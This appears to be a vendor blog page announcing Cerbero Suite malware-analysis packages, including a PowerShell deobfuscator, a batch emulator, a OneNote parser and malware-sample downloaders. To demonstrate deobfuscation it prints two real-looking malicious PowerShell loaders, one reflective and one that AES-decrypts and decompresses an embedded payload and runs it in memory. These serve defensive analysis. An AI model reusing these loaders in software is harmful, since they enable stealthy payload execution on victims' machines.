A quick 70-seconds introduction to Silicon Shellcode Emulator: a lightweight x86/x64 emulator designed for Windows shellcode. This package is available to all commercial licenses of Cerbero Suite Advanced.
Category: Package
URL Extractor Package
We have released the URL Extractor package for all licenses of Cerbero Suite Advanced! This package prints out URLs detected when scanning a file.
In this specific image, URL Extractor detected a URL inside a VBS script contained in a Cabinet archive stored in the resources of an executable inside a OneNote document inside a Zip archive.
OneNote Format Package: All Licenses
As of today, the “OneNote Format” package is available to all licenses of Cerbero Suite! The package was previously released for commercial licenses only.
Installing the package from Cerbero Store takes only a few mouse clicks.
Once the package is installed, you can directly inspect OneNote documents in Cerbero Suite and all embedded files are automatically extracted and ready to be inspected.
PowerShell Beautifier 2.0 Package
We have released version 2.0 of our commercial PowerShell Beautifier package. The new release adds the option to remove unused variables.
For example, this is a snippet of a malicious script:
$T = 'Get' $M = $T + 'Method' $I = 'Invoke' $T = $T + 'Type' $L = 'Load' $Q0 = [Reflection.Assembly] $B = $Q0::$L($MyS) $B = $B.$T('NewPE2.PE') $B = $B.$M('Execute') $Ub = 'C:\Windows\Microsoft' $z = $Ub + '.NET\Framewor' $VT = $z + 'k\v4.0.30' $XQ = $VT + '319\RegSvcs.exe' $B = $B.$I($null,[object[]] ($XQ,$serv))
With both variable replacement and removal of unused variables enabled it becomes:
$load_result = [Reflection.Assembly]::Load($x_result) $get_type_result = $load_result.GetType('NewPE2.PE') $get_method_result = $get_type_result.GetMethod('Execute') $invoke_result = $get_method_result.Invoke($null, [object[]]('C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe', $x_result_2))
TAR Format Package
We have released the “TAR Format” package for all licenses of Cerbero Suite Standard and Advanced.
The package is also exposed to the SDK:
from Pro.Core import * from Pkg.TAR import * def parseTARArchive(fname): c = createContainerFromFile(fname) if c.isNull(): return obj = TARObject() if not obj.Load(c) or not obj.ParseArchive(): return curoffs = None while True: entry, curoffs = obj.NextEntry(curoffs) if entry == None: break # skip directories if obj.IsDirectory(entry): continue print("file name:", entry.name, "file offset:", str(entry.offset_data), "file size:", str(entry.size)) # retrieves the file data as NTContainer fc = obj.GetEntryData(entry)
PowerShell Beautifier Package
PowerShell code is often seen in malware. To help the analysis of such code we have just released the “PowerShell Beautifier” package. The package is available to all commercial licenses of Cerbero Suite Advanced.
The package features a complete parser for the PowerShell language and has many deobfuscation capabilities. If your organization is interested in integrating our PowerShell beautifier in a cloud service, please contact us.
The beautifier can be invoked as an action: Ctrl+R -> PowerShell -> PowerShell Beautifier.
Let’s look at an example of obfuscated PowerShell code:
$mcWPL = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('%~f0').Split([Environment]::NewLine);foreach ($jBqHb in $mcWPL) { if ($jBqHb.StartsWith(':: ')) { $qUflk = $jBqHb.Substring(3); break; }; };$AKzOG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($qUflk);$GTqqO = New-Object System.Security.Cryptography.AesManaged;$GTqqO.Mode = [System.Security.Cryptography.CipherMode]::CBC;$GTqqO.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$GTqqO.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rYCDvAfAeZYTmiLeZKnw0z4us9jgkCckB7mS60qxxg4=');$GTqqO.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JYh62EWEKCuIH7WrUJ0VdA==');$QTfFw = $GTqqO.CreateDecryptor();$AKzOG = $QTfFw.TransformFinalBlock($AKzOG, 0, $AKzOG.Length);$QTfFw.Dispose();$GTqqO.Dispose();$xVFCH = New-Object System.IO.MemoryStream(, $AKzOG);$qGLhv = New-Object System.IO.MemoryStream;$wRtOX = New-Object System.IO.Compression.GZipStream($xVFCH, [IO.Compression.CompressionMode]::Decompress);$wRtOX.CopyTo($qGLhv);$wRtOX.Dispose ();$xVFCH.Dispose();$qGLhv.Dispose();$AKzOG = $qGLhv.ToArray();$VBqqY = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($AKzOG);$ReoQh = $VBqqY.EntryPoint;$ReoQh.Invoke($null, (, [string[]] ('%*')))
Simple Batch Emulator Package
To help in the analysis of malware which uses Windows batch scripts we just released a package on Cerbero Store called “Simple Batch Emulator”. The name of the package is self-explanatory as it provides a basic emulator for batch scripts. The package is available to all commercial licenses of Cerbero Suite Advanced.
The following is a malicious OneNote document. All embedded files are automatically extracted thanks to the “OneNote Format” package.
Two of the embedded files are batch scripts. We can execute the action to emulate the obfuscated batch code.
OneNote Format Support
Microsoft OneNote is rising in popularity as a vector for malware. Therefore, all commercial licenses of Cerbero Suite can now download our “OneNote Format” package from Cerbero Store which parses the OneNote format and extracts embedded files.
Installing the package from Cerbero Store takes only a few mouse clicks.
Once the package is installed, you can directly inspect OneNote documents in Cerbero Suite and all embedded files are automatically extracted and ready to be inspected.
Sample Downloader Package
We have just released our Sample Downloader package and it is available for all licenses of Cerbero Suite Advanced.
While this is a simple package, we consider it extremely useful, as it allows to download malware samples by their hash. The package tries to download the requested samples from various supported intelligence services.
Check out the video presentation for a quick introduction!
Installing the Sample Downloader package from Cerbero Store takes only a few clicks. Once installed, you can go to the settings and enter your API keys for the supported intelligence services.
AbuseCH Intelligence 2.0 Package
The soon to be released 5.7 version of Cerbero Suite Advanced comes with an improved version of the originally named ‘MalwareBazaar Intelligence’ commercial package. We have renamed the package to ‘AbuseCH Intelligence’ and greatly extended its functionality.
Check out the video presentation to quickly learn about its features.
Installing the AbuseCH Intelligence package from Cerbero Store takes only a few clicks.
Once installed, you can search malware samples on MalwareBazaar.
Searches can be performed using all supported parameters and also include recently uploaded samples.
Malware samples can be downloaded and analyzed right away, without ever leaving the Cerbero Suite user interface.
When you open a file in the analysis workspace, the complete MalwareBazaar intelligence can be accessed directly from the report.
Highlighted entries in the report can be activated to continue searching for additional malware samples.
The discovered malware samples can be batch-downloaded and are automatically added to the current project.
You can also perform custom searches on MalwareBazaar using the relevant action.
And, of course, all analyzed files are saved inside the current project.
We’re soon going to showcase the functionality of this package in more detail while performing real-world malware analysis.